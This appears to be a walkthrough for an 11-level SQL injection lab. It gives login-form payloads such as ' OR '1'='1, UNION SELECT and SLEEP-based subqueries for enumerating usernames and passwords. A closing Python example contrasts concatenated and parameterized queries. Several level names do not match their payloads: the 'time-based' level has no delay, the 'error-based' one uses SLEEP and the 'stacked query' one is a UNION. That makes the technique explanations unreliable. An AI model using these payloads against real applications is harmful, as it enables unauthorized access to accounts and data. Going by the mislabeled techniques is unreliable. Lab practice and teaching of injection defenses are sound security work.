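Level 1: Basic Input-Based Injection
Walkthrough
- Observe the target: first look at the input box, enter a single quote (') and check whether an error is returned.
- Construct the payload: if the single quote returns an error, try the following payload:
  ' OR '1'='1
- Test the payload: enter the constructed payload into the input box; if a correct result is returned, a SQL injection vulnerability is present.
Example
-- Correct query
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- Query with the constructed payload
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';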
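Level 2: Union Query Injection
Walkthrough
- Observe the target: enter a single quote (') and check whether an error is returned.
- Construct the payload: if the single quote returns an error, try the following payload:
  ' OR 1=1 LIMIT 1,1
- Test the payload: enter the constructed payload into the input box; if a correct result is returned, a SQL injection vulnerability is present.
Example
-- Correct query
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- Query with the constructed payload
SELECT * FROM users WHERE username = '' OR 1=1 LIMIT 1,1;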
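Level 3: Time-Based Blind Injection
Walkthrough
- Observe the target: enter a single quote (') and check whether an error is returned.
- Construct the payload: if the single quote returns an error, try the following payload:
  ' AND (SELECT COUNT(*) FROM users) > 0
- Test the payload: enter the constructed payload into the input box; if a correct result is returned, a SQL injection vulnerability is present.
Example
-- Correct query
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- Query with the constructed payload
SELECT * FROM users WHERE username = '' AND (SELECT COUNT(*) FROM users) > 0;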
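Level 4: Boolean-Based Blind Injection
Walkthrough
- Observe the target: enter a single quote (') and check whether an error is returned.
- Construct the payload: if the single quote returns an error, try the following payload:
  ' AND (SELECT COUNT(*) FROM users) > 1
- Test the payload: enter the constructed payload into the input box; if a correct result is returned, a SQL injection vulnerability is present.
Example
-- Correct query
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- Query with the constructed payload
SELECT * FROM users WHERE username = '' AND (SELECT COUNT(*) FROM users) > 1;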
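Level 5: Stacked Query Injection
Walkthrough
- Observe the target: enter a single quote (') and check whether an error is returned.
- Construct the payload: if the single quote returns an error, try the following payload:
  ' UNION SELECT * FROM users
- Test the payload: enter the constructed payload into the input box; if a correct result is returned, a SQL injection vulnerability is present.
Example
-- Correct query
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- Query with the constructed payload
SELECT * FROM users WHERE username = '' UNION SELECT * FROM users;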
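Level 6: Error-Based Injection
Walkthrough
- Observe the target: enter a single quote (') and check whether an error is returned.
- Construct the payload: if the single quote returns an error, try the following payload:
  ' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b)
- Test the payload: enter the constructed payload into the input box; if a correct result is returned, a SQL injection vulnerability is present.
Example
-- Correct query
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- Query with the constructed payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b);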
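Level 7: Error Message Injection
Walkthrough
- Observe the target: enter a single quote (') and check whether an error is returned.
- Construct the payload: if the single quote returns an error, try the following payload:
  ' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND '1'='1
- Test the payload: enter the constructed payload into the input box; if a correct result is returned, a SQL injection vulnerability is present.
Example
-- Correct query
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- Query with the constructed payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND '1'='1';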
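Level 8: Conditional Statement Injection
Walkthrough
- Observe the target: enter a single quote (') and check whether an error is returned.
- Construct the payload: if the single quote returns an error, try the following payload:
  ' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) OR '1'='1
- Test the payload: enter the constructed payload into the input box; if a correct result is returned, a SQL injection vulnerability is present.
Example
-- Correct query
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- Query with the constructed payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) OR '1'='1';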
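Level 9: Enumerating Usernames via Blind Injection
Walkthrough
- Observe the target: enter a single quote (') and check whether an error is returned.
- Construct the payload: if the single quote returns an error, try the following payload:
  ' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND username = 'admin
- Test the payload: enter the constructed payload into the input box; if a correct result is returned, a SQL injection vulnerability is present.
Example
-- Correct query
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- Query with the constructed payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND username = 'admin';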
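Level 10: Enumerating Passwords via Blind Injection
Walkthrough
- Observe the target: enter a single quote (') and check whether an error is returned.
- Construct the payload: if the single quote returns an error, try the following payload:
  ' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND password = 'admin
- Test the payload: enter the constructed payload into the input box; if a correct result is returned, a SQL injection vulnerability is present.
Example
-- Correct query
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- Query with the constructed payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND password = 'admin';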
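Level 11: Combined Application of Blind SQL Injection
Walkthrough
- Observe the target: enter a single quote (') and check whether an error is returned.
- Construct the payload: combining the injection techniques learned in the earlier levels, construct the following payload:
  ' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND username = 'admin' AND password = 'admin
- Test the payload: enter the constructed payload into the input box; if a correct result is returned, a SQL injection vulnerability is present.
Example
-- Correct query
SELECT * FROM users WHERE username = 'admin' AND password = 'admin';
-- Query with the constructed payload
SELECT * FROM users WHERE username = '' AND (SELECT 1 FROM (SELECT NULL, (SELECT SLEEP(5)) AS a) AS b) AND username = 'admin' AND password = 'admin';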
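The following added example (not part of the original walkthrough or of the lab's code) runs the page's login query two ways: built by string concatenation and as a parameterized statement. It shows why the single-quote probe and the level payloads stop having any effect once input is bound as data. It assumes Python's sqlite3 module with a constructed users table; the function names and sample rows are illustrative.

```python
import sqlite3

# Constructed sample data; the table layout follows the page's query.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "admin"), ("alice", "s3cret")])
    return db

def build_query_vulnerable(username, password):
    # String concatenation: whatever the user types becomes SQL text.
    return ("SELECT * FROM users WHERE username = '" + username +
            "' AND password = '" + password + "';")

def login_vulnerable(db, username, password):
    try:
        return db.execute(build_query_vulnerable(username, password)).fetchall()
    except sqlite3.Error as exc:
        # Echoing the database error is the signal the "observe" step looks for.
        return "SQL error: %s" % exc

def login_safe(db, username, password):
    # Placeholders: values are bound as data and never parsed as SQL.
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()

# Inputs taken from the page: the single-quote probe, level 1 and level 5.
PAGE_INPUTS = ["'", "' OR '1'='1", "' UNION SELECT * FROM users"]

def compare(db):
    """Return {input: (concatenated_outcome, parameterized_outcome)}."""
    return {p: (login_vulnerable(db, p, ""), login_safe(db, p, ""))
            for p in PAGE_INPUTS}

if __name__ == "__main__":
    db = make_db()
    # The level 1 input rewrites the WHERE clause into the page's example query.
    print(build_query_vulnerable("' OR '1'='1", ""))
    for payload, (vuln, safe) in compare(db).items():
        print(repr(payload), "| concatenated:", vuln, "| parameterized:", safe)
```

With concatenation, each input either breaks parsing (and leaks a database error) or changes the structure of the WHERE clause. With bound parameters, every input is compared as a literal username and matches no row.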
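With the walkthroughs above, you should now have a handle on the techniques for solving the 11-level SQL injection lab challenge. In practice, be sure to comply with applicable laws and regulations and never use these techniques for illegal purposes. Best of luck in your cybersecurity work!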
